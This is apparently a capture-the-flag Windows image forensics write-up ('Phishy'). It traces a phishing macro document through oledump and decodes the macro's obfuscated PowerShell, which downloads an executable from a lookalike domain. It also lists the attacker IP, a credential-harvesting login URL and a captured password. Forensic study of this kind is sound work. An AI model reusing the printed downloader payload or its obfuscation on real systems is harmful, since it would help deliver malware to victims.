Phishy -Windows Image Forensics

What is the computer name of the victim machine?

WIN-NF3JQEU4G0T

What is the messenger app installed on the victim machine?

Whatsapp

Hacker tricked the victim into downloading a malicious document. Provide the URL of this document.

# Users/Semah/AppData/Roaming/Whatsapp/Databases/msgstore.db
# Whatsapp app viewer.exe
http://appIe.com/IPhone-Winners.doc

Multiple streams contain macros in the document. Provide the number of highest one.

$ python3 oledump.py ../IPhone-Winners.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      8473 '1Table'
  5:       501 'Macros/PROJECT'
  6:        68 'Macros/PROJECTwm'
  7:      3109 'Macros/VBA/_VBA_PROJECT'
  8:       800 'Macros/VBA/dir'
  9: M    1170 'Macros/VBA/eviliphone'
 10: M    5581 'Macros/VBA/iphoneevil'
 11:      4096 'WordDocument'

10

The macro attempted to run a program. Provide the program name?

$ python3 oledump.py ../IPhone-Winners.doc -s 10 -v > encrypt.txt
$ sed -e 's/Chr(/ /g' encrypt.txt > encrypt1.txt
$ sed 's/) &/ /g' encrypt1.txt > encrypt2.txt
$ sed 's/  //g' encrypt2.txt > encrypt3.txt

# And then remove unwanted string
97 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 51 65 71 85 65 89 103 66 121 65 71 85 65 99 81 66 49 65 71 85 65 99 119 66 48 65 67 65 65 76 81 66 86 65 72 73 65 97 81 65 103 65 67 99 65 97 65 66 48 65 72 81 65 99 65 65 54 65 67 56 65 76 119 66 104 65 72 65 65 99 65 66 74 65 71 85 65 76 103 66 106 65 71 56 65 98 81 65 118 65 69 107 65 99 65 66 111 65 71 56 65 98 103 66 108 65 67 52 65 90 81 66 52 65 71 85 65 74 119 65 103 65 67 48 65 84 119 66 49 65 72 81 65 82 103 66 112 65 71 119 65 90 81 65 103 65 67 99 65 81 119 65 54 65 70 119 65 86 65 66 108 65 71 48 65 99 65 66 99 65 69 107 65 85 65 66 111 65 71 56 65 98 103 66 108 65 67 52 65 90 81 66 52 65 71 85 65 74 119 65 103 65 67 48 65 86 81 66 122 65 71 85 65 82 65 66 108 65 71 89 65 89 81 66 49 65 71 119 65 100 65 66 68 65 72 73 65 90 81 66 107 65 71 85 65 98 103 66 48 65 71 107 65 89 81 66 115 65 72 77 65 112 111 119 101 114 115 104 101 108 108 32 45 69 110 99 111 100 101 100 67 111 109 109 97 110 100 87 83 99 114 105 112 116 46 83 104 101 108 108


Answer - powershell

The macro attempted to download a malicious file. Provide the URL of the malicious file?

# Decimal to Ascii
97 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 51 65 71 85 65 89 103 66 121 65 71 85 65 99 81 66 49 65 71 85 65 99 119 66 48 65 67 65 65 76 81 66 86 65 72 73 65 97 81 65 103 65 67 99 65 97 65 66 48 65 72 81 65 99 65 65 54 65 67 56 65 76 119 66 104 65 72 65 65 99 65 66 74 65 71 85 65 76 103 66 106 65 71 56 65 98 81 65 118 65 69 107 65 99 65 66 111 65 71 56 65 98 103 66 108 65 67 52 65 90 81 66 52 65 71 85 65 74 119 65 103 65 67 48 65 84 119 66 49 65 72 81 65 82 103 66 112 65 71 119 65 90 81 65 103 65 67 99 65 81 119 65 54 65 70 119 65 86 65 66 108 65 71 48 65 99 65 66 99 65 69 107 65 85 65 66 111 65 71 56 65 98 103 66 108 65 67 52 65 90 81 66 52 65 71 85 65 74 119 65 103 65 67 48 65 86 81 66 122 65 71 85 65 82 65 66 108 65 71 89 65 89 81 66 49 65 71 119 65 100 65 66 68 65 72 73 65 90 81 66 107 65 71 85 65 98 103 66 48 65 71 107 65 89 81 66 115 65 72 77 65 112 111 119 101 114 115 104 101 108 108 32 45 69 110 99 111 100 101 100 67 111 109 109 97 110 100 87 83 99 114 105 112 116 46 83 104 101 108 108

# After Decoded you will get base64
aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcAA6AC8ALwBhAHAAcABJAGUALgBjAG8AbQAvAEkAcABoAG8AbgBlAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACcAQwA6AFwAVABlAG0AcABcAEkAUABoAG8AbgBlAC4AZQB4AGUAJwAgAC0AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMApowershell -EncodedCommandWScript.Shell

# After decoded base64
invoke-webrequest -Uri 'http://appIe.com/Iphone.exe' -OutFile 'C:\Temp\IPhone.exe' -UseDefaultCredentials%

Answer - http://appIe.com/Iphone.exe

Where was the malicious file written by the macro? Format: Provide the full path

C:\Temp\IPhone.exe

What the name of the framework to create the malware downloaded by the macro?

# Upload in virus total and check Detection
Metasploit

What is the attacker's IP address?

# Check Relations tab
155.94.69.27

The fake giveaway used a login page to collect user information. Provide the full URL to this login page?

# places.sqlite
http://appIe.competitions.com/login.php

What is the password the user submitted to the login page?

# Dump firefox profile and load it
passwordfox.exe /profile <profilename>
GacsriicUZMY4xiAF4yl

PreviousHireMe - Windows Image Forensics NextAfricanFalls - Windows Image Forensics

Last updated 4 years ago